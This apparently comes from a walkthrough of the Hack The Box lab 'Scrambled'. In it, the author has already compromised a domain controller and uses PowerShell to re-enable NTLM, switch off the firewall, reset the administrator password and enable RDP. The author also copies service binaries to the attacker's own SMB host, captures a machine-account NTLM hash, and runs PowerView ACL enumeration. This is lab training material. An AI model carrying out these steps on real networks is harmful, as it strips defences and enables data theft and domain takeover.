Beyond


While I had Scrambled ways to compromise the target system leading to complete domain compromise, I decided to investigate how the target system had the NTLM authentication disabled across the entire network and what specific configurations are responsible for that.

ps c:\temp> cmd /c gpresult /Scope Computer /h c:\temp\gpresult.html

The command above dump the security configuration of both system and domain into a single HTLM file. This command is almost always limited to high-privileged users, such as administrator or SYSTEM

Opening up the HTML file through Firefox, and navigating to Policies > Windows Settings > Security Settings > Local Policies/Security Options > Other, I see those 3 attribute set to Deny All. Those 3 configurations are directly responsible for disabling NTLM authentication

Those can also be check manually through PowerShell

ps c:\temp> Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0"
 
 
auth132                      : IISSUBA
auth2                        : RASSFM
ntlmminclientsec             : 0
ntlmminserversec             : 536870912
restrictreceivingntlmtraffic : 2
restrictsendingntlmtraffic   : 2
auditntlmindomain            : 0
pspath                       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
                               Lsa\MSV1_0
psparentpath                 : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
                               Lsa
pschildname                  : MSV1_0
psdrive                      : HKLM
psprovider                   : Microsoft.PowerShell.Core\Registry

Checking the registry indeed reveals those 3 configurations. Now, I will turn that around.

ps c:\temp> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictSendingNTLMTraffic" -Value 0
ps c:\temp> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictReceivingNTLMTraffic" -Value 0
ps c:\temp> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictSendingNTLM2Traffic" -Value 0
ps c:\temp> Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0"
 
auth132                      : IISSUBA
auth2                        : RASSFM
ntlmminclientsec             : 0
ntlmminserversec             : 536870912
restrictreceivingntlmtraffic : 0
restrictsendingntlmtraffic   : 0
auditntlmindomain            : 0
restrictsendingntlm2traffic  : 0
pspath                       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
                               Lsa\MSV1_0
psparentpath                 : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
                               Lsa
pschildname                  : MSV1_0
psdrive                      : HKLM
psprovider                   : Microsoft.PowerShell.Core\Registry

It’s done. restrictreceivingntlmtraffic, restrictsendingntlmtraffic, and RestrictSendingNTLM2Traffic are all set to 0

Now I should be able to use the NTLM authentication across the entire domain/network

ps c:\temp> Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False

I will first drop the firewall before testing the NTLM authentication

ps c:\temp> net user administrator Qwer1234
The command completed successfully.

I will then change the password of the administrator user

┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ evil-winrm -i dc1.scrm.local -u administrator -p Qwer1234
 
Evil-WinRM shell v3.4
 
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
info: Establishing connection to remote endpoint
 
*evil-winrm* ps c:\Users\administrator\Documents> whoami
scrm\administrator
*evil-winrm* ps c:\Users\administrator\Documents> hostname
DC1
*evil-winrm* ps c:\Users\administrator\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::181
   ipv6 address. . . . . . . . . . . : dead:beef::8516:7ac6:78b:c7b
   link-local ipv6 address . . . . . : fe80::8516:7ac6:78b:c7b%14
   ipv4 address. . . . . . . . . . . : 10.10.11.168
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%14
                                       10.10.10.2

Like so, I am able to WinRM to the DC1 host with the NTLM authentication

┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ smbclient -L //dc1.scrm.local/ -U "administrator%Qwer1234"
 
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	HR              Disk      
	IPC$            IPC       Remote IPC
	IT              Disk      
	NETLOGON        Disk      Logon server share 
	Public          Disk      
	Sales           Disk      
	SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to dc1.scrm.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Same goes for the SMB server!

ps c:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
ps c:\temp> netsh firewall add portopening TCP 3389 "Remote Desktop"
 
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.

I also enabled RDP

┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ xfreerdp /u:administrator /p:Qwer1234 /v:dc1.scrm.local /cert:ignore /dynamic-resolution 
[22:49:08:579] [237193:237194] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[22:49:08:579] [237193:237194] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[22:49:08:800] [237193:237194] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[22:49:08:800] [237193:237194] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[22:49:08:800] [237193:237194] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp
[22:49:09:748] [237193:237194] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]

Connecting to the RDP service running on the port 3389 using xfreerdp

Now I have an interactive RDP session

Objects


EU OU


Users


Groups


Service Accounts OU


DNS


WS01$


Services


ps c:\Temp> cmd /c sc qc ScrmOrders
[SC] QueryServiceConfig SUCCESS
 
service_name: ScrmOrders
        type               : 10  WIN32_OWN_PROCESS 
        start_type         : 2   AUTO_START
        error_control      : 1   NORMAL
        binary_path_name   : C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411
        load_order_group   : 
        tag                : 0
        display_name       : Scramble Sales Orders Server
        dependencies       : 
        service_start_name : LocalSystem
 
ps c:\Temp> ls "C:\Program Files\ScrambleCorp\SalesOrdersService"
 
 
    directory: C:\Program Files\ScrambleCorp\SalesOrdersService
 
 
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       03/11/2021     21:05          19456 ScrambleLib.dll                                                       
-a----       03/11/2021     21:05          11776 ScrambleServer.exe                                                    
-a----       03/11/2021     21:05          17408 ScrambleServerLib.dll          
 
ps c:\Temp> cmd /c copy "C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe" \\10.10.16.8\smb\smb\
        1 file(s) copied.
ps c:\Temp> cmd /c copy "C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServerLib.dll" \\10.10.16.8\smb\smb\
        1 file(s) copied.

ScrambleServer.exe ScrambleServerLib.dll

Web


PS C:\inetpub> ls
 
 
    Directory: C:\inetpub
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       04/02/2020     01:45                custerr
d-----       08/11/2021     00:24                history
d-----       08/02/2020     22:30                logs
d-----       04/02/2020     01:45                temp
d-----       04/11/2021     19:03                wwwroot
 
PS C:\inetpub> ls .\wwwroot\
 
 
    Directory: C:\inetpub\wwwroot
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       04/11/2021     00:01                assets
d-----       04/11/2021     18:56                images
-a----       04/11/2021     18:13           2313 index.html
-a----       04/11/2021     19:01           2888 newuser.html
-a----       04/11/2021     01:19           1668 passwords.html
-a----       04/11/2021     19:00           2340 salesorders.html
-a----       04/11/2021     18:55           2204 support.html
-a----       29/05/2022     17:50           2476 supportrequest.html

GP


rsop.msc


Default Domain Controllers Policy Default Domain Policy

Default Domain Policy


Default Domain Controllers Policy


Changed!


Changed! Domain-wide

Also enabled this at Computer Configuration\Policies\Administrative Templates\Network\Lanman Workstation So that file transfer from the target system to Kali over SMB is possible

ps c:\Temp> cmd /c gpupdate /FORCE
Updating policy...
 
Computer Policy update has completed successfully.
User Policy update has completed successfully.

done

┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ simplesmb . -smb2support 
[*] Incoming connection (10.10.11.168,63108)
[*] AUTHENTICATE_MESSAGE (SCRM\DC1$,DC1)
[*] User DC1\DC1$ authenticated successfully
[*] dc1$::SCRM:aaaaaaaaaaaaaaaa:6895cc3b4b98efe08ce34a2ebdc7a46b:01010000000000000007ffcc471dda016f832cc4f47ac645000000000100100071004800760048006400570063004d000300100071004800760048006400570063004d000200100050004100640045006b0064006b0048000400100050004100640045006b0064006b004800070008000007ffcc471dda010600040002000000080030003000000000000000000000000040000061ea1ce070279bddae8b0c6c1311484bf02dc1fee5bfe6dfd7f9ccf7c4e94b610a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0038000000000000000000
[*] connecting share(1:smb)
[*] disconnecting share(1:smb)
[*] Closing down connection (10.10.11.168,63108)
 
ps c:\Temp> cmd /c copy \\10.10.16.8\smb\PowerView.ps1 .
        1 file(s) copied.

EU Users


EU Computers


SMB


ADCS


Templates


MSSQL


ACL


PS C:\Temp> . .\PowerView.ps1
PS C:\Temp> Find-InterestingDomainAcl -Domain SCRM.LOCAL -ResolveGUIDs
Find-InterestingDomainAcl -Domain SCRM.LOCAL -ResolveGUIDs
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
 
 
ObjectDN                : CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=@,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=m.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=a.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=b.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=c.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=d.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=e.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=f.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=g.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=h.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=i.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=j.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=k.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=l.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : CN=DFSR-LocalSettings,CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : All
AceFlags                : None
AceType                 : AccessAllowedObject
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1000
IdentityReferenceName   : DC1$
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
IdentityReferenceClass  : computer
 
ObjectDN                : CN=Domain System Volume,CN=DFSR-LocalSettings,CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : All
AceFlags                : Inherited
AceType                 : AccessAllowedObject
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1000
IdentityReferenceName   : DC1$
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
IdentityReferenceClass  : computer
 
ObjectDN                : CN=SYSVOL Subscription,CN=Domain System Volume,CN=DFSR-LocalSettings,CN=DC1,OU=Domain 
                          Controllers,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : All
AceFlags                : Inherited
AceType                 : AccessAllowedObject
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1000
IdentityReferenceName   : DC1$
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
IdentityReferenceClass  : computer

Not much

┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ rpcclient $IP -N -U 'administrator%Qwer1234'
rpcclient $> lookupsids S-1-5-21-2743207045-1827831105-2542523200-1112
S-1-5-21-2743207045-1827831105-2542523200-1112 *unknown*\*unknown* (8)

Likely a deleted AD object